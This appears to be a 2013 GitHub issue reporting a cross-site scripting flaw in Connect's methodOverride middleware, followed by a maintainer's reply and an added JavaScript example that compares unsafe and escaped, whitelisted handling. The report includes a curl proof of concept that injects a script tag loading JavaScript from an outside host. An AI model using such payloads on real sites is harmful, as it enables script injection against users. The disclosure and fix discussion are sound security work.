Security Issue - Cross-Site Scripting with connect.methodOverride() #831

Closed
m13 opened this Issue Jun 27, 2013 · 1 comment

2 participants

@m13

This middleware overwrites req.method with the req.body['_method'] value. When you don't catch the error, it responds with a default error msg: "Cannot [METHOD] [URL]" (https://github.com/senchalabs/connect/blob/6db901f967036ccc3c892b4bcb5bcb59e0b0dca9/lib/proto.js#L155). Because this is not sufficiently sanitized, you can force Cross-Site Scripting in the response:

~ curl "localhost:3000" -d "_method=<script src=http://martes13.net/a.js></script>"
Cannot <SCRIPT SRC=HTTP://MARTES13.NET/A.JS></SCRIPT> /

This is very dangerous because in a server like ExpressJS it won't be handled with an app.all('/*', ...), so all servers using this middleware are vulnerable.

To fix this hole, I don't know if it is better to fix the proto.js#L155 or the middleware.

@tj
Sencha Labs member
tj commented Jun 27, 2013

I patched with an escape for now, but I'll whitelist the methods as well. It's not a huge vulnerability since you can't easily pass around a POST, but it doesn't hurt to escape. Thanks for the report.

@tj tj closed this Jun 27, 2013
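The two fixes discussed in this thread (escape the fallback message, and whitelist the verbs `_method` may switch to), as an added example that is not connect's own code or tj's patch. The request object, the allowed-verb list and the `<b>injected</b>` sample value are constructed for illustration; a real deployment would shorten the list to the verbs it actually needs.

```javascript
// Added example, not code from the connect project: a whitelisted method
// override beside the reported unsafe one, and an HTML-escaped "Cannot METHOD URL"
// fallback beside the unescaped one.

// Verbs the override may switch to (assumed list for this example).
const ALLOWED_OVERRIDES = new Set(['GET', 'POST', 'PUT', 'DELETE', 'PATCH', 'HEAD', 'OPTIONS']);

// Minimal HTML escaping for text that ends up inside an HTML response body.
function escapeHtml(str) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(str).replace(/[&<>"']/g, (c) => map[c]);
}

// Behaviour reported in the issue: whatever is in _method becomes req.method.
function methodOverrideUnsafe(req) {
  if (req.body && typeof req.body._method === 'string') {
    req.method = req.body._method.toUpperCase();
  }
  return req;
}

// Hardened variant: only a known verb may replace req.method; anything else is
// ignored and the original method is kept, so arbitrary text never reaches the
// error message at all.
function methodOverrideSafe(req) {
  if (req.body && typeof req.body._method === 'string') {
    const wanted = req.body._method.toUpperCase();
    if (ALLOWED_OVERRIDES.has(wanted)) {
      req.method = wanted;
    }
  }
  return req;
}

// The fallback text as described in the report, interpolated unescaped.
function notFoundBodyUnsafe(req) {
  return `Cannot ${req.method} ${req.url}`;
}

// Escaped fallback: both the method and the URL are request-controlled text, so
// both are escaped before being placed in the body.
function notFoundBodySafe(req) {
  return `Cannot ${escapeHtml(req.method)} ${escapeHtml(req.url)}`;
}

// Constructed request shaped like the curl call in the report, with a harmless
// marker tag instead of a script element.
function sampleRequest() {
  return { method: 'POST', url: '/', body: { _method: '<b>injected</b>' } };
}

// Run the four combinations and return the resulting bodies for inspection.
function demo() {
  return {
    unsafeOverrideUnsafeBody: notFoundBodyUnsafe(methodOverrideUnsafe(sampleRequest())),
    unsafeOverrideSafeBody: notFoundBodySafe(methodOverrideUnsafe(sampleRequest())),
    safeOverrideUnsafeBody: notFoundBodyUnsafe(methodOverrideSafe(sampleRequest())),
    safeOverrideSafeBody: notFoundBodySafe(methodOverrideSafe(sampleRequest())),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Either fix on its own closes the reported reflection; applying both means the whitelist keeps unexpected verbs out of routing while the escaping protects any other path that still renders req.method or req.url into HTML.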